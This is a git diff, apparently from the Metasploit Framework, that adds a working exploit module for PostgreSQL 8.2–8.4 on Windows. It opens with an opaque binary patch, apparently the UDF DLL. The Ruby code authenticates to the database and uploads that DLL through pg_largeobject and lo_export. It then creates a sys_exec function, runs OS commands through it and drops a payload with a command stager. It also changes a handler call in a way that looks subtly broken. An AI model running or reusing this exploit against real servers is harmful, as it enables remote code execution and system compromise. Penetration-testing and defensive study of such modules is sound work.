z6wD=Ye*AI8NQp<y_qP^AqTPpYhLzpywx-QaCw9hvxZT)VbK?>^bIy6fnMlTIbcA`s
zh<(t}M<!dXsJO@kLHg#~M@lnpKM>~RteKIGZx~<Qk+G5RFlJ4Mc@~sT%~6SN+YVCA
zl%)f;lwCCS@)C8<48N7_X=&84lEJBn1iH~Ff>6S$iZ!szmDS->X&M)n%1XJob4DWb
zT$Sp2?d3|j8>gcJe>v20BXB?yEo|`?_OEUGn6xtT98x@&KH^q%7k4oHrmVX(D(qhT
zul=Mx`tPP0$=6$2!YFG#q7?hQNhkJ49bzR7oowyJ_nag6%zllQbA5EL(Vvu?#J!B~
z@}TvVZWw)>V_7hdl@sxWk$hqN=N3{_MD+Ar#IuMvJ1Wlhv-mLsH9o|VXSkxjEm+v$
zmXV0LM#k*FsQ75RtsHNLKe=IJ9`oOG{_=!*46CqK%FLH?R-^l}lk{cfCF<_aix)6!
z-Z<ypTEaM&LCs`ySe8n%dB|sVuMHo0UY}-Ovid=Bb_5COdPhCjhc2AO9b*-ZDAY|S
z#>CU(J(jP&efUz!M_)&zuy9@EbqCag$WaRgOMfk5tpDSYg6}To)7x_5`O<M}aCkN`
zIb_0pK#!LSm&BPmPmiLf`0I;Vw~D&Lt&gntt$Ae6@rGSt8F$v?PE>NqjKg1Nmrq3g
zwkl##yxZqDdbi*CJU(*R+dPFe^0f=EH4W1v+mZLhlCH=#cc9~Y1vK1F=T(FNc1P>Z
zXjhX9-Nk<jW8}$M?^c#_vxL*KilO=G<0VJ0Tp~J)MvHOAxYReIZH!QyZxO-|nAtSk
zEv@eVIAOr*MmeO*zuDI-{D5AaV{yYf9Uhtgc!&EH?^ZQAZ|)u6%8uOwuBT2b)6qy?
zu}4$c+q1(nD!G|-1}QyfTVTPayl_9<?2wZ;KW0dLxpBUpmNmW{i`U5m!(9Y+l<x<J
zeCdj<wkxMbIN`*Z0YomDNGMA>5{jP*1y)bIxBY$fr<LrWU1A;yKU+4~%21F=q1M{o
ziG7E3jd_tCyD*;aT;8;e!A<QPN?IGm^T>DiPc-LSYI{Pc_-hivsbCy8v`E^P+(;r?
za;Us97Iobl$A)H`qq)$d8AYo-hWd7L0)m4&J4`X&JGK+3?8EHW>wnKqTrvI7*av5C
zj{e7ctj#(7g~jBB@|^91-Cl2c_%Fx_?R_}vrKxSj-4RwN3Ej3HR!f9oYdo*91G;aW
z$)3BK((A$gJxqFYri~gAea)ttyqHp+opW`i6J_sck4M{qX4^?zPGX*``1n`Zr|@*Q
zx^2~Ck!KA|D@lYEE?@e7M^)sM{x`{*nfdwJucSLZS1uqQPpNM1YF@=xL|~9xZAGzB
zxb_X<!m&{|>d!etf=ef87|%ow^R0HQ%i9-D=S?j++@?*ro)~<d*&NG0NRaip+SU>U
zS!c-{=h8dq{A0`Zd6qxYQ>@u!+||f&{pBh%_VM}Ik=^>c#Yf(m`Q43`sXv%&57ajl
zr4H*PSN3o|^&ZN6J8+tCb?CQp_W^R`UY=|0@!|HnKBLTDjOC%1ZH1^~FXo%*PuhyC
zH3g6T&+pjLxFh&DLH^bLhsQtEed5wU5=WkJl2KsK&O_rg-1eNIRg=iKVYc+QRJgi%
zy^phT7xqm27WLW0mi(Rh+%iVTE+?nks@-WT*%j-*YH|NriN92orYm-i%+AB+r3|o&
z48z-x-5c8|%4%Kt&zP1f#q`&&#ja=6cFbGgva@N)TloHbv2jdRo0(6v8Q(Fw@A>C9
z`Gp@sq?o<__q2nhoTI-B=+2R&M$)O&9DJ2^q@Py%fO@38mqi;s?@I7q2aR@<@M|RF
zmXMH;QiM>x-sBe<5>m6Z2!gU}y-fI<f;>d>)*!)?!mE|58veG<85e``#o$I!?IwLt
zaEKsuLD<6Zh}flZ@d?ZPt1Mp(>I-m*traf9DhrCr(nay2ip(YFPaHy0ce@4d8NYu5
z1<fsPQEt3eW>mu(#K4tm<XjPqAWBW4Avab&h@#DElG1?arHEF~&k9Krh%ypZW(wnD
ziCR>v6~KlPS6!~5NUDc(jdBG^R+4MG-`rdlB-fTLQYi~0I&GncVZ)^D`dXEj#85Fk
z9ah0o1MHQ*VX}&^lNU7Z^6U%^IA1nO>SDfOG#lqhNrAXnx9=Kok+45Cn%U!XZ+iD$
z+PAnHKG;TFn8|NL^IFKyJu|as;n%YR8{J#uQRu*-Z~T~Vre(rVX6L~}hYrazyb>})
z%G;_x>BVoxEQgUeqh7ycWRSQ#qlh4tuaHj@RTvPsI)4aNXDHQhtYMi_1ycfqdaVpz
z08QO67y`4TN@ST<FRCm-n_K-;3yNVG!WJv_h*7GFRjK?LQ(+~VxSW;wj5H&xuMn<U
zx6X!BgsP>QWpP@g&?#_9&katz(jYBR`6nw2^wPNQe^j@`s|>HLFvP<J#=^o`6=j&=
zrV}O?(bh~&(L3XVhsT5E3FXUlh*GQh`|C|_9d2;%aLG8?nQL=XpWN@fqW<Es=I$>`
zV)m+aQvUKZm+pTrsV>V*^J^6AzV*nR<MM-s$)M%d$`a*@M!2M{S<_FH%{R=Hte1gf
zrS{%cmlWlgME%R_5}Cf_v&t_JFS$fxWIIs<Fvri+^sxK*MqA*oh>KbxdS5NmRj`Mu
zZf=YyHnvC<a%Cw)5~tI#sydpoIml#zME?4N=8-B%kycy6dt0QDAQd{;wM9+XT_Ig*
zkZ7qtSAKrde6eq?e4Pd^S31w4jU1fDgiDUqj?_ph^r7NKYR~Rj>o1Hh?^H}l6xp_h
zlWY?L-m`+^4M+HA4Qms0KI&hv-GrOE1&iU|-`^xd|5I%!l&phx6ra)27-iqj(iQ%K
zXr&Z+j}g4YTh$K<tRN1>$92YBnj6pA&6)H@q>~GkR6UNO?gW>NX}&}vl}+W*<~sSz
zB`wdI>*Piu5nSnDPmg+&sWev#hclf(^dQh#M3NiPm*C7KvVEOtJBLskd7dAE#Blav
za72NL;Y5hka!mU+nNAT<DKxr~M09mIrAAAgXra?-99Kp(Vd+<hH=C&3etmK%$eHfs
zl|pcv!Jvom$g~9Fu!6tQhT=l;oAJG5yr(A?58bv^C!)z1g5%VE=IL>p?9{XKeIwmv
znu^l{ah;^?*Lqkq>|+7xTvhWuC?AK%Zn*Cqg9&9pb9%3S0g;G8e^&p<i9D|XKN>p*
z+kj2`$(RRu*7y&Xc_vW9>&x?fGo;+UH=+4m{Qe8X7HRnn=-(LiPR#?|!}Uw^`TAd_
zWQ084B2D5@r$J>g{ILBt#jGG4KFFiNT-m?Ozb(~%r0tIh#rEVIyi+w_G*YVn23^MB
zQvLj8&8Od8>Tw-6lJ3$74o^o#ILHMQOu*51J&%lG)}8=I`}|Yjz|5*U1?@x8Eb|4l
zpHW|5zlFGLGif=-W+Yj?&G#mpZTi9Ez!rKz;@pO@8HS9Mrv`>Q!JX#2I6b4imkhkk
z!zhASzJAfZ^CiZ}jeUuKC78J#yI~S~fTHFfFm>$t=E;dt<`(QyFsK#A(LNb?v+Au_
z^J%<=WIl&C_u<Qa!+hVD48&_JqbEYaNVkxd2i%Rql#QB}K*sx4(iRC`(SDcQ-p1N=
zX3m(Y|1M_O?n~I*bL%QdUI;-}5~U4^vP$rEH9<%9AlC;%^EooQ8*hN1T_7B}4Y_7{
zl$Ch@vrKe183=(n$$~R?;QMb%gWFEiAuyD>H50*Yz!>QKqK3+xF&$RirZbLSL5H~h
zTRbLMR}@yzHMakj^)ot%1G*nZ(H476LYPsE7iFP8)xE(4RTdMs+LS-LI$M|_v<tJP
zb@4n?F%)se_}DyP>XYrUm%jd2^%P+Katnf3LO+OQf42W0+mjLx2I7Fh1DKxW@Jwzm
zRR#TtoB|B&b*Nn6AqGZwo;X0+F%T3bH5g!ZfvSRAu2yLb(SAm~W|2Ww1goWnK($h)
z*BZ16Bv7VRFOnM6{L)}QE?8WY3fO>%VZ8yY5z&6Z{2;%@3@Vo!h3Jh2WQ9hd{U1gX
zJn;jb23Tg)E0GFE94=^4dU&l7^a9I;dSxkC7z<&;bLETbgmU0&U#ybhQdq@R*{{)l
zQo{;OskQ{x`*DrRSeXnqfZP;Pl>zo!95w%W?3bON$A7`%zx5t9|D~};&3~TslR1#X
zI#?rzHL_>9L_L!ru}|mvkA9xb{tDoLfb_Zc6)f7XOsNrs_;EE-HDFSnJq5lvE+U8@
zm!9FrEqylk5&R&2NN`X{2tVA<Ue&cHs@2EpWkpH^>=lf95THCf4CssnDy1w5uE+qh
zVt;4~S$Kh<AVL}p2ZzIg0{gVQI+~~BjGF)F8T=u4<obvIVqq+J-JZ7qP*=qRyx1ZD
z@A-->0r0$6WY2ukfjl2T2Ver&24HXRJ*6K!rAZ0tD-)6hA^iB{WGF=>j!OqqCReE-
zoz{R9>R|&PE{B0%vQ{d0Y>4y~V60$sX5V$i%H_ZU{G^`luz<`yiO+ek<I>8WbIbIw
zJ(9vfbWezVND%R9-I`wm{;PloRci+>gE5W)cmlco|2OOmasiYD&<mC-`*Kwe?zwgy
zxK9LjVt^8WN`UPE9|1H1d<oD2VDAA7;UGMydV@UyM24Phcb_D?Rt0v$V83f{Oo6aa
zqLvmaWfFx^BZG8>5`_|cs&=)cK&gRCrC^p`6#j_>d}}Y;D8QGghoy4p#VGcBhqL3x
d?qk1sZfdVtgA}2Z=)@(-OYAxPtNqms{1^J07+3%R

literal 0
HcmV?d00001

diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb
index 1fcc8b03db..32c387f47f 100644
--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -1165,7 +1165,7 @@ class Exploit < Msf::Module
 	def handler(*args)
 		return if not payload_instance
 		return if not handler_enabled?
-		return payload_instance.handler(*args)
+		return payload_instance.handler(args)
 	end
 
 	##
diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb
index 4348b06482..22ec2abfe6 100644
--- a/lib/msf/core/exploit/postgres.rb
+++ b/lib/msf/core/exploit/postgres.rb
@@ -264,5 +264,88 @@ module Exploit::Remote::Postgres
 		end
 	end
 
+	# Creates the function sys_exec() in the pg_temp schema.
+	def postgres_create_sys_exec(dll)
+		q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language C returns null on null input immutable"
+		resp = postgres_query(q);
+		if resp[:sql_error]
+			print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}"
+			return false
+		end
+		return true
+	end
+
+	def dll_fname(version)
+		File.join(Msf::Config.install_root,"data","exploits","postgres",version,"lib_postgresqludf_sys.dll")
+	end
+
+	# This presumes the pg_temp.sys_exec() udf has been installed, almost
+	# certainly by postgres_create_sys_exec()
+	def postgres_sys_exec(cmd)
+		q = "select pg_temp.sys_exec('#{cmd}')"
+		resp = postgres_query(q)
+		if resp[:sql_error] 
+			print_error resp[:sql_error]
+			return false
+		end
+		return true
+	end
+
+	# Takes a local filename and uploads it into a table as a Base64 encoded string.
+	# Returns an array if successful, false if not.
+	def postgres_upload_binary_file(fname)
+		data = postgres_base64_file(fname)
+		tbl,fld = postgres_create_stager_table
+		return false unless data && tbl && fld
+		q = "insert into #{tbl}(#{fld}) values('#{data}')"
+		resp = postgres_query(q)
+		if resp[:sql_error]
+			print_error resp[:sql_error]
+			return false
+		end
+		oid, fout = postgres_write_data_to_disk(tbl,fld)
+		return false unless oid && fout
+		return [tbl,fld,fout,oid]
+	end
+
+	# Writes b64 data from a table field, decoded, to disk.
+	def postgres_write_data_to_disk(tbl,fld)
+		oid = rand(60000) + 1000
+		fname = Rex::Text::rand_text_alpha(8) + ".dll"
+		queries = [
+			"select lo_create(#{oid})",
+			"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
+			"select lo_export(#{oid}, '#{fname}')"
+		]
+		queries.each do |q|
+			resp = postgres_query(q)
+			if resp && resp[:sql_error]
+				print_error "Could not write the library to disk."
+				print_error resp[:sql_error]
+				break
+			end
+		end
+		return oid,fname
+	end
+
+	# Base64's a file and returns the data.
+	def postgres_base64_file(fname)
+		data = File.open(fname, "rb") {|f| f.read f.stat.size}
+		[data].pack("m*").gsub(/\r?\n/,"")
+	end
+
+	# Creates a temporary table to store base64'ed binary data in.
+	def postgres_create_stager_table
+		tbl = Rex::Text.rand_text_alpha(8).downcase
+		fld = Rex::Text.rand_text_alpha(8).downcase
+		resp = postgres_query("create temporary table #{tbl}(#{fld} text)")
+		if resp[:sql_error]
+			print_error resp[:sql_error]
+			return false
+		end
+		return [tbl,fld]
+	end
+
+
 end
 end
diff --git a/modules/exploits/windows/postgres/postgres_payload.rb b/modules/exploits/windows/postgres/postgres_payload.rb
new file mode 100644
index 0000000000..e50ee68e67
--- /dev/null
+++ b/modules/exploits/windows/postgres/postgres_payload.rb
@@ -0,0 +1,147 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::Postgres
+	include Msf::Exploit::CmdStagerVBS
+
+	# Creates an instance of this module.
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'PostgreSQL for Microsoft Windows Payload Execution',
+			'Description'    => %q{
+				This module creates and enables a custom UDF (user defined function) on the
+				target host via the UPDATE pg_largeobject method of binary injection. On
+				default Microsoft Windows installations of PostgreSQL (=< 8.4), the postgres
+				service account may write to the Windows temp directory, and may source
+				UDF DLL's from there as well.
+
+				PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are 
+				valid targets for this module.
+
+				NOTE: This module will leave a payload executable on the target system when the
+				attack is finished, as well as the UDF DLL and the OID.
+			},
+			'Author'         => 
+			[
+				'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the postgresql udf libraries 
+				'todb' # this Metasploit module
+			],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'URL', 'http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf',
+						'URL', 'http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql' # A litte more specific to PostgreSQL
+					]
+				],
+			'Platform'       => 'win',
+			'Targets'        =>
+		[
+			[ 'Automatic', { } ], # Confirmed on XXX 
+		],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Apr 10 2009' # Date of Bernardo's BH Europe paper.
+		))
+		register_options(
+			[
+				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ])
+		])
+
+		deregister_options('SQL', 'RETURN_ROWSET')
+	end
+
+	# Buncha stuff to make typing easier.
+	def username; datastore['USERNAME']; end
+	def password; datastore['PASSWORD']; end
+	def database; datastore['DATABASE']; end
+	def verbose; datastore['VERBOSE']; end
+	def rhost; datastore['RHOST']; end
+	def rport; datastore['RPORT']; end
+
+	def execute_command(cmd, opts)
+		postgres_sys_exec(cmd)
+	end
+
+	def exploit
+		version = get_version(username,password,database,verbose)
+		case version
+		when :nocompat; print_error "Authentication successful, but not a compatable version."
+		when :noauth; print_error "Authentication failed."
+		when :noconn; print_error "Connection failed."
+		end
+		return unless version =~ /8\.[234]/
+		print_status "Authentication successful and vulnerable version #{version} on Windows confirmed."
+		tbl,fld,dll,oid = postgres_upload_binary_file(dll_fname(version))
+		unless tbl && fld && dll && oid
+			print_error "Could not upload the UDF DLL"
+			return 
+		end
+		print_status "Uploaded #{dll} as OID #{oid} to table #{tbl}(#{fld})"
+		ret_sys_exec = postgres_create_sys_exec(dll)
+		if ret_sys_exec
+			if @postgres_conn
+				execute_cmdstager({:linemax => 1500, :nodelete => true})
+				handler
+				postgres_logout if @postgres_conn
+			else
+				print_error "Lost connection."
+				return
+			end
+		end
+		postgres_logout if @postgres_conn
+	end
+
+	def dll_fname(version)
+		File.join(Msf::Config.install_root,"data","exploits","postgres",version,"lib_postgresqludf_sys.dll")
+	end
+
+	# A shorter version of do_fingerprint from the postgres_version scanner
+	# module, specifically looking for versions that valid targets for this
+	# module.
+	def get_version(user=nil,pass=nil,database=nil,verbose=false)
+		begin
+			msg = "#{rhost}:#{rport} Postgres -"
+			password = pass || postgres_password
+			print_status("Trying username:'#{user}' with password:'#{password}' against #{rhost}:#{rport} on database '#{database}'") if verbose
+			result = postgres_fingerprint(
+				:db => database,
+				:username => user,
+				:password => password
+			)
+			if result[:auth]
+				# So, the only versions we have DLL binaries for are PostgreSQL 8.2, 8.3, and 8.4
+				# This also checks to see if it was compiled with a windows-based compiler --
+				# the stock Postgresql downloads are Visual C++ for 8.4 and 8.3, and GCC for mingw)
+				# Also, the method to write files to disk doesn't appear to work on 9.0, so
+				# tabling that version for now.
+				if result[:auth] =~ /PostgreSQL (8\.[234]).*(Visual C++|mingw|cygwin)/i 
+					return $1
+				else
+					print_status "Found #{result[:auth]}"
+					return :nocompat
+				end
+			else
+				return :noauth
+			end
+		rescue Rex::ConnectionError
+			print_error "#{rhost}:#{rport} Connection Error: #{$!}" if datastore['VERBOSE']
+			return :noconn
+		end
+	end
+
+end
+